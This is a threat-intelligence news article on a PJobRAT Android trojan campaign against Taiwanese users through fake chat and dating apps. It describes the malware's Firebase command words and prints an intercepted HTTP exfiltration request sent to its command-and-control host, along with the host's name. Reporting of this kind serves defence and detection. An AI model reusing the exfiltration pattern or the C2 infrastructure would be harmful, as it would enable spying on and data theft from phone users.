PJobRAT, an Android Remote Access Trojan (RAT) that first came to light in 2019, has recently made a notable comeback, showcasing enhanced capabilities and a more refined targeting strategy. Originally documented for its attacks on Indian military personnel in 2021, this malware has now shifted its focus, compromising users in Taiwan through sophisticated social engineering tactics.
By cleverly disguising itself as legitimate dating and instant messaging applications, PJobRAT lures unsuspecting victims into downloading malicious apps from compromised websites. The threat actor behind this operation exhibits remarkable persistence and adaptability, with the latest campaign reportedly running for around 22 months, spanning from early 2023 to October 2024.
Distribution of this malware primarily took place through WordPress sites that hosted fake messaging applications, such as “SaangalLite,” which appears to mimic the legitimate SignalLite, and “CChat,” which impersonates a previously legitimate app.
The relatively small infection footprint indicates that these attacks are highly targeted rather than part of a widespread campaign. Researchers at Sophos have identified significant technical advancements in the latest variants of PJobRAT. While the malware retains its core functionality of exfiltrating sensitive information—including SMS messages, contacts, device details, and media files—it now boasts enhanced command execution capabilities. This evolution significantly broadens the threat actor’s control over compromised devices.
Infection
Upon installation, the malicious applications provide users with basic chat functionality, creating a facade of legitimacy while covertly establishing persistence on the device. The apps request extensive permissions, including exemptions from battery optimization, to ensure they can operate continuously in the background.
The malware’s communication infrastructure employs a dual-channel approach to maximize resilience. Firebase Cloud Messaging (FCM) serves as the primary command channel, allowing the threat actor to trigger various functions through predefined commands such as “aceamace” (upload SMS), “chall” (run shell command), and “kontak” (upload contacts). This method cleverly disguises malicious traffic within expected Android communication patterns.
A secondary HTTP-based communication channel is utilized for data exfiltration to the command-and-control server (westvist[.]myftp[.]org). This channel transmits stolen information using multipart form requests, as illustrated in the intercepted traffic:
POST /mchowasrv/main.php HTTP/1.1
Content-Type: multipart/form-data; boundary=a3c1b36e-3ce6-4117-8ed1-7af403ad1023
Content-Length: 1336
Host: westvist.myftp.org:3574
Connection: Keep-Alive
User-Agent: okhttp/4.10.0While this specific campaign seems to have reached its conclusion, the ongoing evolution of PJobRAT underscores the persistent threat posed by sophisticated mobile malware targeting high-value individuals.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
